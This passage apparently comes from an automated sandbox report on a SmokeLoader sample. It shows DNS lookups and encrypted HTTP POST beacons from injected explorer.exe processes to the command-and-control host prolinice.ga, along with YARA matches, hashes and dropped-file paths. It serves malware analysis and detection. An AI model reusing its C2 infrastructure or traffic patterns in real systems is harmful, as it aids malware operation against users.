                      May 28, 2024 08:25:19.609683990 CEST804974777.232.129.190192.168.2.4
                      May 28, 2024 08:25:40.378094912 CEST4974880192.168.2.477.232.129.190
                      May 28, 2024 08:25:40.383552074 CEST804974877.232.129.190192.168.2.4
                      May 28, 2024 08:25:40.383635998 CEST4974880192.168.2.477.232.129.190
                      May 28, 2024 08:25:40.383744001 CEST4974880192.168.2.477.232.129.190
                      May 28, 2024 08:25:40.383760929 CEST4974880192.168.2.477.232.129.190
                      May 28, 2024 08:25:40.388658047 CEST804974877.232.129.190192.168.2.4
                      May 28, 2024 08:25:40.388712883 CEST804974877.232.129.190192.168.2.4
                      May 28, 2024 08:25:41.411209106 CEST804974877.232.129.190192.168.2.4
                      May 28, 2024 08:25:41.411328077 CEST804974877.232.129.190192.168.2.4
                      May 28, 2024 08:25:41.411382914 CEST4974880192.168.2.477.232.129.190
                      May 28, 2024 08:25:41.412235975 CEST4974880192.168.2.477.232.129.190
                      May 28, 2024 08:25:41.416240931 CEST804974877.232.129.190192.168.2.4

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      May 28, 2024 08:23:58.905642986 CEST5080153192.168.2.41.1.1.1
                      May 28, 2024 08:23:59.168926954 CEST53508011.1.1.1192.168.2.4

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      May 28, 2024 08:23:58.905642986 CEST192.168.2.41.1.1.10x43d2Standard query (0)prolinice.gaA (IP address)IN (0x0001)false

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      May 28, 2024 08:23:59.168926954 CEST1.1.1.1192.168.2.40x43d2No error (0)prolinice.ga77.232.129.190A (IP address)IN (0x0001)false

                      HTTP Request Dependency Graph

                      • ucwdyepiwprre.org
                        • prolinice.ga
                      • klhdddxmavj.net
                      • angnktfflahc.com
                      • wcxnjsqwwfpkqnc.net

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.44973677.232.129.190802580C:\Windows\explorer.exe
                      TimestampBytes transferredDirectionData
                      May 28, 2024 08:23:59.175649881 CEST279OUTPOST /index.php HTTP/1.1
                      Connection: Keep-Alive
                      Content-Type: application/x-www-form-urlencoded
                      Accept: */*
                      Referer: http://ucwdyepiwprre.org/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                      Content-Length: 233
                      Host: prolinice.ga
                      May 28, 2024 08:23:59.175669909 CEST233OUTData Raw: 6e e2 e1 fe b0 4a 86 61 6e 65 bf 12 4c 5f f2 82 a5 51 9d 50 47 8f bb ea ff e8 7f 1e da 4f 44 70 32 c0 9d c1 0d ad 85 a2 67 ba c4 fa 9a a0 20 26 e8 37 1e 48 8c 38 2e e3 36 d6 88 68 45 d7 76 e0 a7 3a bc 52 ee cc 59 3b 1f d6 b3 50 4c 85 0c de 9f a3
                      Data Ascii: nJaneL_QPGODp2g &7H8.6hEv:RY;PLi]Oh4og# $O6#N#<RNa~J9X\a*PZMD0>4}i1^&xUO7yZ(twOKp.+L~$
                      May 28, 2024 08:24:00.120784044 CEST1236INHTTP/1.1 404 Not Found
                      Date: Tue, 28 May 2024 06:23:59 GMT
                      Server: Apache/2.4.59 (Debian)
                      Connection: close
                      Transfer-Encoding: chunked
                      Content-Type: text/html; charset=utf-8
                      Data Raw: 35 32 64 38 38 0d 0a b9 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b ec 13 ad 26 44 90 de ef 3f 52 b4 a5 1d 0f 76 5e ee 37 a5 3a 38 64 25 38 a9 5e 19 de 43 7b 19 8a 78 2b e4 d1 73 bb 1b 96 f5 28 a6 be 4e 30 95 05 bc f7 23 ab 0f 0b 51 2a f5 2c 33 4d ed 17 40 1a 79 0c 2b 7b de 73 27 cf 50 68 9e 83 b3 e0 74 d2 13 5d fa 05 cb 86 bf 9a ff 99 b4 c1 53 49 97 f0 22 d3 3a b8 db 32 2e 28 81 82 51 ca 8d b4 0d 1e e5 5a f2 1c 1e 60 9d f8 6c ea 89 06 f0 fe 0b e0 be ed fc ac 8d 8d 20 19 bb ad d3 9e 70 c1 62 64 38 e6 ad f3 9c 8d b7 27 5d c1 30 78 b2 34 fc 64 ca 38 5b 03 cf 4b a0 90 08 00 ca 2c 05 00 7c e1 f7 57 09 03 02 00 09 00 9e 03 00 00 53 1f 7d 22 77 32 62 71 76 3f 4f 55 52 12 42 00 c9 32 ee 68 fe 0f ca 76 74 07 d6 d6 f9 b8 92 29 e8 55 92 92 3e c8 50 dd 24 a4 99 ce 5c 90 b9 3b fc 51 49 c0 0d f0 19 d3 e9 92 2a 7a f7 09 00 bb 7a b8 01 84 b7 a3 64 8b 0b f3 9f 79 57 fa 26 ce 46 fb 76 8c c7 a7 e0 22 d1 2d c9 1e 43 c3 ef c1 4c dd a0 af 3d b8 a8 a5 fb c0 70 8e 98 0e df 4b cc 40 42 f2 70 5e a2 6b 51 b2 9f [TRUNCATED]
                      Data Ascii: 52d88_'!yS5&D?Rv^7:8d%8^C{x+s(N0#Q*,3M@y+{s'Pht]SI":2.(QZ`l pbd8']0x4d8[K,|WS}"w2bqv?OURB2hvt)U>P$\;QI*zzdyW&Fv"-CL=pK@Bp^kQfsjDk$+K*PPN2\WlT#6zbRKZ :D?UkKc'O?i@i3E| [}S2TqL L7@x!F*Ex{4@h;pg_Q@[N2*H%s;"r21LVRvo9bN|P,ds,^L+j m.&>g!=/r:l_U*kH >(OAO|q;@+o%Snnq nU[f&C5GT] T]>g{v[ySzB8IX<\r}23:=;HX>H+exij=Ou`'p3|JY=R^Xo[#kn^T-la@9>$z|kXv6]O8Rp|otzAY2u-jk75HwbEIrBG`yDvWR0md9n/o [TRUNCATED]
                      May 28, 2024 08:24:00.120834112 CEST224INData Raw: d0 7e ed e5 00 cd 59 0c 72 ff c8 4d 8a 9f 4d 22 6a 89 67 05 b3 b9 2f fa 37 ad b4 05 f0 4c 9c d2 83 fb c8 40 2b ca 87 d7 d8 99 59 38 07 be e8 b3 e1 23 2a af e7 50 60 c1 62 4e 47 09 99 34 01 6f 12 1a 46 5a dc 19 8a 32 8e 3a 4a 46 78 d9 bd c0 47 06
                      Data Ascii: ~YrMM"jg/7L@+Y8#*P`bNG4oFZ2:JFxGcCl_\?+m6z3QU.yjlx`Z,8yO62nr~r)@l;i2,!a'MyPXN_k0aW,xqWbsevmB
                      May 28, 2024 08:24:00.120872021 CEST1236INData Raw: 8c 13 15 48 2c 63 3a fe 6c 25 54 4d 30 85 30 92 ad 37 23 ec 06 31 91 f0 16 ff a2 b3 e1 cd 3c d6 3f 9c 79 ef 0e 00 cb f5 93 99 65 d5 2d f5 67 a5 df 07 1c 74 f5 67 bd 63 db 08 77 af d3 8c 6d 56 60 26 f6 24 45 a8 5e 97 11 75 41 b4 77 49 98 30 71 b8
                      Data Ascii: H,c:l%TM007#1<?ye-gtgcwmV`&$E^uAwI0q:<#yfHJy<4^/|gxgaD{t`viG"J+`RsqN:#(]5%f__`BxTCB/Z|-t[DDgd/pXL
                      May 28, 2024 08:24:00.120912075 CEST1236INData Raw: e4 1d 37 e6 75 5c 03 96 01 ae 43 a2 02 37 3a 0c bb 2c 23 f6 16 c7 34 0b 51 a1 b0 42 47 f6 c4 67 8a ab d3 20 36 0f b2 ce 0f b0 08 1a b5 21 fe 8d 1b a2 44 ad 36 e0 77 5c 98 a2 fe 1c 8d ed 29 14 9b f8 aa 38 f5 1e c1 35 2f 97 51 4e 7c 84 77 95 ee de
                      Data Ascii: 7u\C7:,#4QBGg 6!D6w\)85/QN|wn2+w0/86Su9"M.k$qW[PNkW,RPj+\mT~/^\U&gB,5<z#{4s/X/5e?s$lQ7]F
                      May 28, 2024 08:24:00.120946884 CEST1236INData Raw: 76 42 63 9d f6 9b 07 14 29 a7 e1 78 c2 42 36 6a 58 0a 60 23 51 bf 62 27 01 e7 c5 7d 19 05 9d be 9b b5 07 54 be 5e 5e 62 6e ad 7d 76 06 9c a3 e1 b9 8d ef cd 66 61 75 c8 9e 29 8d 8f 4e 72 29 15 bc f2 3c 68 2f 82 44 67 71 60 3f 94 9d 7c 6c 44 9a d5
                      Data Ascii: vBc)xB6jX`#Qb'}T^^bn}vfau)Nr)<h/Dgq`?|lD~c^%u=6N!\}K14KH;z<d#C^n+~UdH+J8SSo_g+>yS^5%#B>ef)wO/jHP:+ -
                      May 28, 2024 08:24:00.120981932 CEST1236INData Raw: 2d 53 82 bd 66 00 6a 4f 59 66 f7 4f 3f 64 a0 0b 80 c4 24 55 57 f4 3d fb 23 d0 de c5 4b 19 0a 54 5a fe ff c3 bd 04 8f 42 07 68 c9 d2 dc e0 02 14 01 a2 56 a5 31 58 c7 29 8b b7 d1 6a 47 a4 44 d4 5f 87 43 d9 f3 f9 12 9f da 66 d2 14 69 65 fe 9f 52 b4
                      Data Ascii: -SfjOYfO?d$UW=#KTZBhV1X)jGD_CfieRHncQl'$u;qdB4]*^%oAwKlos\if[y-ea(78i4v>ZGNj-L.EQO h/8gHmxPPc!}P04 .
                      May 28, 2024 08:24:00.121014118 CEST896INData Raw: 75 0d d7 f2 13 5b 04 97 57 f5 04 0d 66 a1 c5 ab f7 48 4d d3 dc 47 fa 12 e4 8d b8 3e 8d ea 47 ab a3 bd 57 3d 95 5d bb bf 25 df f0 35 85 82 41 16 0e 6a 17 5a 41 bc 5d 5b 61 fc 7a 2c e0 3a 53 9b 00 2f 8d d7 71 2b 0e de e5 aa 0f 00 49 07 5a 45 0f 1e
                      Data Ascii: u[WfHMG>GW=]%5AjZA][az,:S/q+IZE,I`J|fj9A+h[kZ.N'/PqsN^gt9@TMz%wwlN%]V sL9`eoEQ,,KPLzTl
                      May 28, 2024 08:24:00.121057987 CEST1236INData Raw: 16 30 02 45 55 5a 28 71 df 03 a9 d5 a3 6e 6d 54 81 f9 01 96 b0 09 28 a6 03 2e d0 c3 6d 13 d9 81 41 46 15 0b ba f9 b3 7e 65 76 92 5d cc 1e ae a9 35 b4 41 50 5c 10 7a 7f 88 38 1a ab bb 21 b9 69 ca 04 6b ff b9 a2 96 71 4a eb 5b 56 13 2c 9e 54 5b 3f
                      Data Ascii: 0EUZ(qnmT(.mAF~ev]5AP\z8!ikqJ[V,T[?>Jy;t!Oj}Hxq:?Ig(TW--^rL-m\HTXd.elx 9b71SmX~io"r~L&\@[
                      May 28, 2024 08:24:00.121088028 CEST224INData Raw: 3e d4 f9 b3 b7 95 fc d2 44 f5 2d db 0a e5 e9 86 70 da e1 4f 6b 80 17 d7 ab d4 a0 08 24 67 24 e3 fe c2 c7 f6 91 d7 cc 2d 16 83 7e af 9b 2b 47 23 a5 d8 d3 76 93 1d 90 c9 11 a9 a7 7d f7 ab 8c 62 8d c9 7e 36 f4 e0 89 2f 9e df 1f 76 3e 3b ef 65 26 1a
                      Data Ascii: >D-pOk$g$-~+G#v}b~6/v>;e&HxtE8^L4,r2T5n9nD0Sk1%o[;Wch\Zty"n*_vUL*WvNzY&k:_@qfh)[\
                      May 28, 2024 08:24:00.121438980 CEST1236INData Raw: fd 05 4c 9d ba f2 ec 4d 6a f5 8d 8a ae 38 4c be b2 c6 8a e5 63 79 a3 8c 19 79 3a 5f 77 90 9c 7c 94 e4 f9 4f 7c 3a ba 38 a1 7f 33 47 55 9b 2e 52 17 3d ce b6 e7 90 7d 0f 3a 11 da 07 18 69 c9 f9 71 a7 39 b5 5b 4e dc c5 8a f3 54 7d 5d 3b d2 b1 96 9f
                      Data Ascii: LMj8Lcyy:_w|O|:83GU.R=}:iq9[NT}];XuaJ6[?'ZGPIOpo9oQDoOVFhuu<gB#qx)z#j-d$hUe4U4GX (7@2$.


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.44973777.232.129.190807616C:\Windows\SysWOW64\explorer.exe
                      TimestampBytes transferredDirectionData
                      May 28, 2024 08:24:02.212639093 CEST275OUTPOST /index.php HTTP/1.1
                      Connection: Keep-Alive
                      Content-Type: application/x-www-form-urlencoded
                      Accept: */*
                      Referer: http://prolinice.ga/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                      Content-Length: 4431
                      Host: prolinice.ga
                      May 28, 2024 08:24:02.212672949 CEST4431OUTData Raw: 6e e2 e1 fe b0 4a 86 61 6e 65 bf 12 4c 5f f2 82 a5 51 9d 50 47 8f bb ea ff e8 7f 1e da 4f 44 70 32 c0 9d c1 0d ad 85 a2 67 ba c4 b0 d5 ee 65 75 c5 67 5d 48 8c 38 2e e3 36 d6 88 68 45 d7 76 e0 a7 9a bd 52 eb cc 59 3b 1f d6 b2 50 4c 85 70 a4 c2 a2
                      Data Ascii: nJaneL_QPGODp2geug]H8.6hEvRY;PLpOc~k_!z1rJC\S7W/x*>x :xGresn*q~DD%vx^2~mt-GD#SO`tAEi*y}`8
                      May 28, 2024 08:24:03.177079916 CEST584INHTTP/1.1 404 Not Found
                      Date: Tue, 28 May 2024 06:24:02 GMT
                      Server: Apache/2.4.59 (Debian)
                      Content-Length: 409
                      Connection: close
                      Content-Type: text/html; charset=utf-8
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f [TRUNCATED]
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.59 (Debian) Server at prolinice.ga Port 80</address></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      2192.168.2.44974677.232.129.190802580C:\Windows\explorer.exe
                      TimestampBytes transferredDirectionData
                      May 28, 2024 08:25:17.382160902 CEST277OUTPOST /index.php HTTP/1.1
                      Connection: Keep-Alive
                      Content-Type: application/x-www-form-urlencoded
                      Accept: */*
                      Referer: http://klhdddxmavj.net/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                      Content-Length: 109
                      Host: prolinice.ga
                      May 28, 2024 08:25:17.382191896 CEST109OUTData Raw: 6e e2 e1 fe b0 4a 86 61 6e 65 bf 12 4c 5f f2 82 a5 51 9d 50 47 8f bb ea ff e8 7f 1e da 4f 44 70 32 c0 9d c1 0d ad 85 a2 67 ba c4 fa 9a a0 20 26 e8 37 1e 48 8c 38 2e e3 36 d6 88 68 45 d7 76 e0 a7 3a bc 52 ee cc 58 3b 1f d6 b3 50 4c 85 1d c6 84 85
                      Data Ascii: nJaneL_QPGODp2g &7H8.6hEv:RX;PLgjngaiF#Q 9
                      May 28, 2024 08:25:18.345221043 CEST343INHTTP/1.1 404 Not Found
                      Date: Tue, 28 May 2024 06:25:18 GMT
                      Server: Apache/2.4.59 (Debian)
                      Content-Length: 168
                      Connection: close
                      Content-Type: text/html; charset=utf-8
                      Data Raw: a4 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b ec 13 ad 26 44 90 de ef 3f 52 b4 a5 1d 0f 76 5e ee 37 a5 3a 38 64 25 38 a9 5e 19 de 43 7b 19 8a 78 2b e4 d1 73 bb 1b 96 f5 28 a6 be 4e 30 95 05 bc f7 23 ab 0f 0b 51 2a f5 2c 33 4d ed 17 40 1a 79 0c 2b 7b de 73 27 cf 50 68 9e 83 b3 e0 74 d2 13 5d fa 05 cb 86 bf 9a ff 99 b4 c1 53 49 97 f0 22 d3 3a b8 db 32 2e 28 81 82 51 ca 8d b4 0d 1e e5 5a f2 1c 1e 60 9d f8 6c ea 89 06 f0 fe 0b e0 be ed fc ac 8d 8d 20 19 bb ad d3 9e 70 c1 62 64 38 e6 ad f3
                      Data Ascii: _'!yS5&D?Rv^7:8d%8^C{x+s(N0#Q*,3M@y+{s'Pht]SI":2.(QZ`l pbd8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      3192.168.2.44974777.232.129.190802580C:\Windows\explorer.exe
                      TimestampBytes transferredDirectionData
                      May 28, 2024 08:25:18.651241064 CEST278OUTPOST /index.php HTTP/1.1
                      Connection: Keep-Alive
                      Content-Type: application/x-www-form-urlencoded
                      Accept: */*
                      Referer: http://angnktfflahc.com/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                      Content-Length: 109
                      Host: prolinice.ga
                      May 28, 2024 08:25:18.651268005 CEST109OUTData Raw: 6e e2 e1 fe b0 4a 86 61 6e 65 bf 12 4c 5f f2 82 a5 51 9d 50 47 8f bb ea ff e8 7f 1e da 4f 44 70 32 c0 9d c1 0d ad 85 a2 67 ba c4 fa 9a a0 20 26 e8 37 1e 48 8c 38 2e e3 36 d6 88 68 45 d7 76 e0 a7 3a bc 52 ee cc 58 3b 1f d6 b3 50 4c 85 1d c6 84 85
                      Data Ascii: nJaneL_QPGODp2g &7H8.6hEv:RX;PLgjngaiF#Q 9
                      May 28, 2024 08:25:19.604626894 CEST343INHTTP/1.1 404 Not Found
                      Date: Tue, 28 May 2024 06:25:19 GMT
                      Server: Apache/2.4.59 (Debian)
                      Content-Length: 168
                      Connection: close
                      Content-Type: text/html; charset=utf-8
                      Data Raw: a4 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b ec 13 ad 26 44 90 de ef 3f 52 b4 a5 1d 0f 76 5e ee 37 a5 3a 38 64 25 38 a9 5e 19 de 43 7b 19 8a 78 2b e4 d1 73 bb 1b 96 f5 28 a6 be 4e 30 95 05 bc f7 23 ab 0f 0b 51 2a f5 2c 33 4d ed 17 40 1a 79 0c 2b 7b de 73 27 cf 50 68 9e 83 b3 e0 74 d2 13 5d fa 05 cb 86 bf 9a ff 99 b4 c1 53 49 97 f0 22 d3 3a b8 db 32 2e 28 81 82 51 ca 8d b4 0d 1e e5 5a f2 1c 1e 60 9d f8 6c ea 89 06 f0 fe 0b e0 be ed fc ac 8d 8d 20 19 bb ad d3 9e 70 c1 62 64 38 e6 ad f3
                      Data Ascii: _'!yS5&D?Rv^7:8d%8^C{x+s(N0#Q*,3M@y+{s'Pht]SI":2.(QZ`l pbd8


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      4192.168.2.44974877.232.129.190802580C:\Windows\explorer.exe
                      TimestampBytes transferredDirectionData
                      May 28, 2024 08:25:40.383744001 CEST281OUTPOST /index.php HTTP/1.1
                      Connection: Keep-Alive
                      Content-Type: application/x-www-form-urlencoded
                      Accept: */*
                      Referer: http://wcxnjsqwwfpkqnc.net/
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                      Content-Length: 109
                      Host: prolinice.ga
                      May 28, 2024 08:25:40.383760929 CEST109OUTData Raw: 6e e2 e1 fe b0 4a 86 61 6e 65 bf 12 4c 5f f2 82 a5 51 9d 50 47 8f bb ea ff e8 7f 1e da 4f 44 70 32 c0 9d c1 0d ad 85 a2 67 ba c4 fa 9a a0 20 26 e8 37 1e 48 8c 38 2e e3 36 d6 88 68 45 d7 76 e0 a7 3a bc 52 ee cc 58 3b 1f d6 b3 50 4c 85 1d c6 84 85
                      Data Ascii: nJaneL_QPGODp2g &7H8.6hEv:RX;PLgjngaiF#Q 9
                      May 28, 2024 08:25:41.411209106 CEST343INHTTP/1.1 404 Not Found
                      Date: Tue, 28 May 2024 06:25:41 GMT
                      Server: Apache/2.4.59 (Debian)
                      Content-Length: 168
                      Connection: close
                      Content-Type: text/html; charset=utf-8
                      Data Raw: a4 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b ec 13 ad 26 44 90 de ef 3f 52 b4 a5 1d 0f 76 5e ee 37 a5 3a 38 64 25 38 a9 5e 19 de 43 7b 19 8a 78 2b e4 d1 73 bb 1b 96 f5 28 a6 be 4e 30 95 05 bc f7 23 ab 0f 0b 51 2a f5 2c 33 4d ed 17 40 1a 79 0c 2b 7b de 73 27 cf 50 68 9e 83 b3 e0 74 d2 13 5d fa 05 cb 86 bf 9a ff 99 b4 c1 53 49 97 f0 22 d3 3a b8 db 32 2e 28 81 82 51 ca 8d b4 0d 1e e5 5a f2 1c 1e 60 9d f8 6c ea 89 06 f0 fe 0b e0 be ed fc ac 8d 8d 20 19 bb ad d3 9e 70 c1 62 64 38 e6 ad f3
                      Data Ascii: _'!yS5&D?Rv^7:8d%8^C{x+s(N0#Q*,3M@y+{s'Pht]SI":2.(QZ`l pbd8


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:02:23:34
                      Start date:28/05/2024
                      Path:C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe"
                      Imagebase:0x400000
                      File size:37'888 bytes
                      MD5 hash:9C0DE297B9EA30FFBE100EE12150F122
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1743449635.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1743449635.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1742950739.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1742950739.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:1
                      Start time:02:23:39
                      Start date:28/05/2024
                      Path:C:\Windows\explorer.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Explorer.EXE
                      Imagebase:0x7ff72b770000
                      File size:5'141'208 bytes
                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:false

                      General

                      Target ID:5
                      Start time:02:23:58
                      Start date:28/05/2024
                      Path:C:\Users\user\AppData\Roaming\rrrrcve
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Roaming\rrrrcve
                      Imagebase:0x400000
                      File size:37'888 bytes
                      MD5 hash:9C0DE297B9EA30FFBE100EE12150F122
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.1970433561.0000000001FC1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.1970433561.0000000001FC1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.1970165138.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.1970165138.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: C:\Users\user\AppData\Roaming\rrrrcve, Author: Joe Security
                      Antivirus matches:
                      • Detection: 100%, Avira
                      • Detection: 100%, Joe Sandbox ML
                      • Detection: 55%, ReversingLabs
                      Reputation:low
                      Has exited:true

                      General

                      Target ID:6
                      Start time:02:24:00
                      Start date:28/05/2024
                      Path:C:\Windows\SysWOW64\explorer.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\explorer.exe
                      Imagebase:0x860000
                      File size:4'514'184 bytes
                      MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:moderate
                      Has exited:true

                      General

                      Target ID:7
                      Start time:02:24:01
                      Start date:28/05/2024
                      Path:C:\Windows\explorer.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\explorer.exe
                      Imagebase:0x7ff72b770000
                      File size:5'141'208 bytes
                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:8
                      Start time:02:24:02
                      Start date:28/05/2024
                      Path:C:\Windows\SysWOW64\explorer.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\explorer.exe
                      Imagebase:0x7ff6ec4b0000
                      File size:4'514'184 bytes
                      MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:moderate
                      Has exited:true

                      General

                      Target ID:9
                      Start time:02:24:03
                      Start date:28/05/2024
                      Path:C:\Windows\SysWOW64\explorer.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\explorer.exe
                      Imagebase:0x860000
                      File size:4'514'184 bytes
                      MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:moderate
                      Has exited:false

                      General

                      Target ID:10
                      Start time:02:24:04
                      Start date:28/05/2024
                      Path:C:\Windows\explorer.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\explorer.exe
                      Imagebase:0x7ff72b770000
                      File size:5'141'208 bytes
                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:11
                      Start time:02:24:05
                      Start date:28/05/2024
                      Path:C:\Windows\SysWOW64\explorer.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\explorer.exe
                      Imagebase:0x860000
                      File size:4'514'184 bytes
                      MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 0000000B.00000002.2941664607.0000000000841000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      Reputation:moderate
                      Has exited:false

                      General

                      Target ID:14
                      Start time:02:24:05
                      Start date:28/05/2024
                      Path:C:\Windows\System32\WerFault.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\WerFault.exe -u -p 7716 -s 700
                      Imagebase:0x7ff67a630000
                      File size:570'736 bytes
                      MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:15
                      Start time:02:24:06
                      Start date:28/05/2024
                      Path:C:\Windows\explorer.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\explorer.exe
                      Imagebase:0x7ff72b770000
                      File size:5'141'208 bytes
                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 0000000F.00000002.2941442653.0000000000F71000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      Reputation:high
                      Has exited:false

                      General

                      Target ID:16
                      Start time:02:24:07
